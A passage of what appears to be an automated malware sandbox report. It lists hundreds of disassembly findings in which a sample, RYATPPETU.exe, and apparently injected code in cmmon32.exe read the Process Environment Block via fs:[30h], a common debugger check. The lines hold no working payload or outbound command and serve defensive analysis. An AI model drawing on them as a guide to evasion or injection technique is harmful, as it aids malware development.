Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E740EA5 mov eax, dword ptr fs:[00000030h] 8_2_1E740EA5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E740EA5 mov eax, dword ptr fs:[00000030h] 8_2_1E740EA5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70FE87 mov eax, dword ptr fs:[00000030h] 8_2_1E70FE87
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AD294 mov eax, dword ptr fs:[00000030h] 8_2_1E6AD294
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AD294 mov eax, dword ptr fs:[00000030h] 8_2_1E6AD294
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67DB60 mov ecx, dword ptr fs:[00000030h] 8_2_1E67DB60
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E748F6A mov eax, dword ptr fs:[00000030h] 8_2_1E748F6A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67DB40 mov eax, dword ptr fs:[00000030h] 8_2_1E67DB40
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E68EF40 mov eax, dword ptr fs:[00000030h] 8_2_1E68EF40
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E748B58 mov eax, dword ptr fs:[00000030h] 8_2_1E748B58
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67F358 mov eax, dword ptr fs:[00000030h] 8_2_1E67F358
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E674F2E mov eax, dword ptr fs:[00000030h] 8_2_1E674F2E
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E674F2E mov eax, dword ptr fs:[00000030h] 8_2_1E674F2E
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AE730 mov eax, dword ptr fs:[00000030h] 8_2_1E6AE730
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70FF10 mov eax, dword ptr fs:[00000030h] 8_2_1E70FF10
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70FF10 mov eax, dword ptr fs:[00000030h] 8_2_1E70FF10
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E73131B mov eax, dword ptr fs:[00000030h] 8_2_1E73131B
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E74070D mov eax, dword ptr fs:[00000030h] 8_2_1E74070D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E74070D mov eax, dword ptr fs:[00000030h] 8_2_1E74070D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E745BA5 mov eax, dword ptr fs:[00000030h] 8_2_1E745BA5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E681B8F mov eax, dword ptr fs:[00000030h] 8_2_1E681B8F
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E681B8F mov eax, dword ptr fs:[00000030h] 8_2_1E681B8F
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E73138A mov eax, dword ptr fs:[00000030h] 8_2_1E73138A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E732073 mov eax, dword ptr fs:[00000030h] 8_2_1E732073
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E741074 mov eax, dword ptr fs:[00000030h] 8_2_1E741074
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E69746D mov eax, dword ptr fs:[00000030h] 8_2_1E69746D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70C450 mov eax, dword ptr fs:[00000030h] 8_2_1E70C450
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70C450 mov eax, dword ptr fs:[00000030h] 8_2_1E70C450
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h] 8_2_1E68B02A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h] 8_2_1E68B02A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h] 8_2_1E68B02A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h] 8_2_1E68B02A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6ABC2C mov eax, dword ptr fs:[00000030h] 8_2_1E6ABC2C
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E744015 mov eax, dword ptr fs:[00000030h] 8_2_1E744015
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E744015 mov eax, dword ptr fs:[00000030h] 8_2_1E744015
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h] 8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6F7016 mov eax, dword ptr fs:[00000030h] 8_2_1E6F7016
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6F7016 mov eax, dword ptr fs:[00000030h] 8_2_1E6F7016
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6F7016 mov eax, dword ptr fs:[00000030h] 8_2_1E6F7016
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E74740D mov eax, dword ptr fs:[00000030h] 8_2_1E74740D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E74740D mov eax, dword ptr fs:[00000030h] 8_2_1E74740D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E74740D mov eax, dword ptr fs:[00000030h] 8_2_1E74740D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E7314FB mov eax, dword ptr fs:[00000030h] 8_2_1E7314FB
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h] 8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70B8D0 mov ecx, dword ptr fs:[00000030h] 8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h] 8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h] 8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h] 8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h] 8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E748CD6 mov eax, dword ptr fs:[00000030h] 8_2_1E748CD6
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B90AF mov eax, dword ptr fs:[00000030h] 8_2_1E6B90AF
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AF0BF mov ecx, dword ptr fs:[00000030h] 8_2_1E6AF0BF
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AF0BF mov eax, dword ptr fs:[00000030h] 8_2_1E6AF0BF
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AF0BF mov eax, dword ptr fs:[00000030h] 8_2_1E6AF0BF
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679080 mov eax, dword ptr fs:[00000030h] 8_2_1E679080
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6F3884 mov eax, dword ptr fs:[00000030h] 8_2_1E6F3884
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6F3884 mov eax, dword ptr fs:[00000030h] 8_2_1E6F3884
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67B171 mov eax, dword ptr fs:[00000030h] 8_2_1E67B171
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67B171 mov eax, dword ptr fs:[00000030h] 8_2_1E67B171
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E69C577 mov eax, dword ptr fs:[00000030h] 8_2_1E69C577
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E69C577 mov eax, dword ptr fs:[00000030h] 8_2_1E69C577
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B3D43 mov eax, dword ptr fs:[00000030h] 8_2_1E6B3D43
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E69B944 mov eax, dword ptr fs:[00000030h] 8_2_1E69B944
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E69B944 mov eax, dword ptr fs:[00000030h] 8_2_1E69B944
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6F3540 mov eax, dword ptr fs:[00000030h] 8_2_1E6F3540
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E697D50 mov eax, dword ptr fs:[00000030h] 8_2_1E697D50
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E748D34 mov eax, dword ptr fs:[00000030h] 8_2_1E748D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h] 8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h] 8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h] 8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h] 8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E694120 mov ecx, dword ptr fs:[00000030h] 8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A513A mov eax, dword ptr fs:[00000030h] 8_2_1E6A513A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A513A mov eax, dword ptr fs:[00000030h] 8_2_1E6A513A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A4D3B mov eax, dword ptr fs:[00000030h] 8_2_1E6A4D3B
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A4D3B mov eax, dword ptr fs:[00000030h] 8_2_1E6A4D3B
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A4D3B mov eax, dword ptr fs:[00000030h] 8_2_1E6A4D3B
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67AD30 mov eax, dword ptr fs:[00000030h] 8_2_1E67AD30
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h] 8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679100 mov eax, dword ptr fs:[00000030h] 8_2_1E679100
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679100 mov eax, dword ptr fs:[00000030h] 8_2_1E679100
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679100 mov eax, dword ptr fs:[00000030h] 8_2_1E679100
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E728DF1 mov eax, dword ptr fs:[00000030h] 8_2_1E728DF1
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67B1E1 mov eax, dword ptr fs:[00000030h] 8_2_1E67B1E1
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67B1E1 mov eax, dword ptr fs:[00000030h] 8_2_1E67B1E1
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67B1E1 mov eax, dword ptr fs:[00000030h] 8_2_1E67B1E1
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A35A1 mov eax, dword ptr fs:[00000030h] 8_2_1E6A35A1
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E69C182 mov eax, dword ptr fs:[00000030h] 8_2_1E69C182
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h] 8_2_1E672D8A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h] 8_2_1E672D8A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h] 8_2_1E672D8A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h] 8_2_1E672D8A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h] 8_2_1E672D8A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AA185 mov eax, dword ptr fs:[00000030h] 8_2_1E6AA185
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F958EC mov eax, dword ptr fs:[00000030h] 15_2_04F958EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05068D34 mov eax, dword ptr fs:[00000030h] 15_2_05068D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0501A537 mov eax, dword ptr fs:[00000030h] 15_2_0501A537
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05013540 mov eax, dword ptr fs:[00000030h] 15_2_05013540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCF0BF mov ecx, dword ptr fs:[00000030h] 15_2_04FCF0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCF0BF mov eax, dword ptr fs:[00000030h] 15_2_04FCF0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCF0BF mov eax, dword ptr fs:[00000030h] 15_2_04FCF0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD90AF mov eax, dword ptr fs:[00000030h] 15_2_04FD90AF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA849B mov eax, dword ptr fs:[00000030h] 15_2_04FA849B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99080 mov eax, dword ptr fs:[00000030h] 15_2_04F99080
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB746D mov eax, dword ptr fs:[00000030h] 15_2_04FB746D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050169A6 mov eax, dword ptr fs:[00000030h] 15_2_050169A6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050605AC mov eax, dword ptr fs:[00000030h] 15_2_050605AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050605AC mov eax, dword ptr fs:[00000030h] 15_2_050605AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB0050 mov eax, dword ptr fs:[00000030h] 15_2_04FB0050
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB0050 mov eax, dword ptr fs:[00000030h] 15_2_04FB0050
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCA44B mov eax, dword ptr fs:[00000030h] 15_2_04FCA44B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h] 15_2_050151BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h] 15_2_050151BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h] 15_2_050151BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h] 15_2_050151BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h] 15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h] 15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h] 15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016DC9 mov ecx, dword ptr fs:[00000030h] 15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h] 15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h] 15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h] 15_2_04FAB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h] 15_2_04FAB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h] 15_2_04FAB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h] 15_2_04FAB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCBC2C mov eax, dword ptr fs:[00000030h] 15_2_04FCBC2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h] 15_2_04FC002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h] 15_2_04FC002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h] 15_2_04FC002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h] 15_2_04FC002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h] 15_2_04FC002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050241E8 mov eax, dword ptr fs:[00000030h] 15_2_050241E8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05048DF1 mov eax, dword ptr fs:[00000030h] 15_2_05048DF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h] 15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0506740D mov eax, dword ptr fs:[00000030h] 15_2_0506740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0506740D mov eax, dword ptr fs:[00000030h] 15_2_0506740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0506740D mov eax, dword ptr fs:[00000030h] 15_2_0506740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h] 15_2_05016C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h] 15_2_05016C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h] 15_2_05016C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h] 15_2_05016C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05064015 mov eax, dword ptr fs:[00000030h] 15_2_05064015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05064015 mov eax, dword ptr fs:[00000030h] 15_2_05064015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05017016 mov eax, dword ptr fs:[00000030h] 15_2_05017016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05017016 mov eax, dword ptr fs:[00000030h] 15_2_05017016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05017016 mov eax, dword ptr fs:[00000030h] 15_2_05017016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9B1E1 mov eax, dword ptr fs:[00000030h] 15_2_04F9B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9B1E1 mov eax, dword ptr fs:[00000030h] 15_2_04F9B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9B1E1 mov eax, dword ptr fs:[00000030h] 15_2_04F9B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAD5E0 mov eax, dword ptr fs:[00000030h] 15_2_04FAD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAD5E0 mov eax, dword ptr fs:[00000030h] 15_2_04FAD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC1DB5 mov eax, dword ptr fs:[00000030h] 15_2_04FC1DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC1DB5 mov eax, dword ptr fs:[00000030h] 15_2_04FC1DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC1DB5 mov eax, dword ptr fs:[00000030h] 15_2_04FC1DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502C450 mov eax, dword ptr fs:[00000030h] 15_2_0502C450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502C450 mov eax, dword ptr fs:[00000030h] 15_2_0502C450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC61A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC61A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC61A0 mov eax, dword ptr fs:[00000030h] 15_2_04FC61A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC35A1 mov eax, dword ptr fs:[00000030h] 15_2_04FC35A1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCFD9B mov eax, dword ptr fs:[00000030h] 15_2_04FCFD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCFD9B mov eax, dword ptr fs:[00000030h] 15_2_04FCFD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2990 mov eax, dword ptr fs:[00000030h] 15_2_04FC2990
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05061074 mov eax, dword ptr fs:[00000030h] 15_2_05061074
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h] 15_2_04F92D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h] 15_2_04F92D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h] 15_2_04F92D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h] 15_2_04F92D8A
